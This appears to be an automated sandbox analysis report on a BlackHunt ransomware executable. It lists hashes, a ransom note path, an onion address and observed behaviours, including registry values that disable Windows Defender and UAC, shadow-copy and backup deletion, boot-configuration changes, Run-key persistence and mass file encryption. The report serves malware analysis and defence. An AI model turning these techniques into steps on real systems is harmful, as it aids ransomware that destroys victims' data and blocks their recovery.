Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
156s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe
Resource
win10v2004-20231215-en
General
-
Target
fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe
-
Size
707KB
-
MD5
e0df8b1939f62f03b8e8847de9208484
-
SHA1
3b5234bd5980cc547f1ce9dc485da187b2480a0e
-
SHA256
fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8
-
SHA512
a550f86c9b4d562a5373ebd451e17c96a31103ea0822dd0f0f4318e4fa35d12a388c2146d8e33ea027489e6ed51575e46fc3c92ac2818d68afd658173ed35076
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1+8fvnh:6uaTmkZJ+naie5OTamgEoKxLWV3h
Malware Config
Extracted
C:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1916 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1252 bcdedit.exe 2788 bcdedit.exe -
Renames multiple (2764) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2120 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\B: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\O: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\G: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\Z: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\X: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\E: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\R: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\T: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\I: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\S: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\M: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\U: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\A: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\H: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\P: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\Y: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\J: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\K: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\L: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\N: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\Q: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jre7\lib\zi\EET fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIconSubpictur.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\tzmappings fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre7\lib\jfxrt.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_MATTE_PAL.wmv fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-core-kit.xml_hidden fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-highlight.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\pushplaysubpicture.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Apia fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\redmenu.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Sofia fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-10 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guyana fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Esl\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_SelectionSubpicture.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\it\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 676 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1896 vssadmin.exe 2168 vssadmin.exe 2332 vssadmin.exe 1548 vssadmin.exe 328 vssadmin.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeRestorePrivilege 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeBackupPrivilege 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeTakeOwnershipPrivilege 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeAuditPrivilege 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeSecurityPrivilege 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeIncBasePriorityPrivilege 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeBackupPrivilege 2080 vssvc.exe Token: SeRestorePrivilege 2080 vssvc.exe Token: SeAuditPrivilege 2080 vssvc.exe Token: SeBackupPrivilege 1180 wbengine.exe Token: SeRestorePrivilege 1180 wbengine.exe Token: SeSecurityPrivilege 1180 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 340 wrote to memory of 2832 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 29 PID 340 wrote to memory of 2832 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 29 PID 340 wrote to memory of 2832 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 29 PID 340 wrote to memory of 2832 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 29 PID 340 wrote to memory of 2908 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 32 PID 340 wrote to memory of 2908 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 32 PID 340 wrote to memory of 2908 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 32 PID 340 wrote to memory of 2908 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 32 PID 340 wrote to memory of 2692 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 33 PID 340 wrote to memory of 2692 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 33 PID 340 wrote to memory of 2692 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 33 PID 340 wrote to memory of 2692 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 33 PID 340 wrote to memory of 2808 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 35 PID 340 wrote to memory of 2808 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 35 PID 340 wrote to memory of 2808 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 35 PID 340 wrote to memory of 2808 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 35 PID 340 wrote to memory of 2264 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 37 PID 340 wrote to memory of 2264 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 37 PID 340 wrote to memory of 2264 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 37 PID 340 wrote to memory of 2264 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 37 PID 340 wrote to memory of 2884 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 44 PID 340 wrote to memory of 2884 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 44 PID 340 wrote to memory of 2884 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 44 PID 340 wrote to memory of 2884 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 44 PID 340 wrote to memory of 2608 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 42 PID 340 wrote to memory of 2608 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 42 PID 340 wrote to memory of 2608 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 42 PID 340 wrote to memory of 2608 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 42 PID 340 wrote to memory of 2740 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 39 PID 340 wrote to memory of 2740 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 39 PID 340 wrote to memory of 2740 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 39 PID 340 wrote to memory of 2740 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 39 PID 340 wrote to memory of 2680 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 45 PID 340 wrote to memory of 2680 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 45 PID 340 wrote to memory of 2680 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 45 PID 340 wrote to memory of 2680 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 45 PID 340 wrote to memory of 2584 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 48 PID 340 wrote to memory of 2584 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 48 PID 340 wrote to memory of 2584 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 48 PID 340 wrote to memory of 2584 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 48 PID 340 wrote to memory of 2640 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 52 PID 340 wrote to memory of 2640 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 52 PID 340 wrote to memory of 2640 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 52 PID 340 wrote to memory of 2640 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 52 PID 340 wrote to memory of 2176 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 49 PID 340 wrote to memory of 2176 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 49 PID 340 wrote to memory of 2176 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 49 PID 340 wrote to memory of 2176 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 49 PID 340 wrote to memory of 2448 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 63 PID 340 wrote to memory of 2448 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 63 PID 340 wrote to memory of 2448 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 63 PID 340 wrote to memory of 2448 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 63 PID 340 wrote to memory of 2520 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 53 PID 340 wrote to memory of 2520 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 53 PID 340 wrote to memory of 2520 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 53 PID 340 wrote to memory of 2520 340 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 53 PID 2584 wrote to memory of 1980 2584 cmd.exe 62 PID 2584 wrote to memory of 1980 2584 cmd.exe 62 PID 2584 wrote to memory of 1980 2584 cmd.exe 62 PID 2884 wrote to memory of 1316 2884 cmd.exe 61 PID 2884 wrote to memory of 1316 2884 cmd.exe 61 PID 2884 wrote to memory of 1316 2884 cmd.exe 61 PID 2680 wrote to memory of 1684 2680 cmd.exe 60 PID 2680 wrote to memory of 1684 2680 cmd.exe 60 -
System policy modification 1 TTPs 3 IoCs
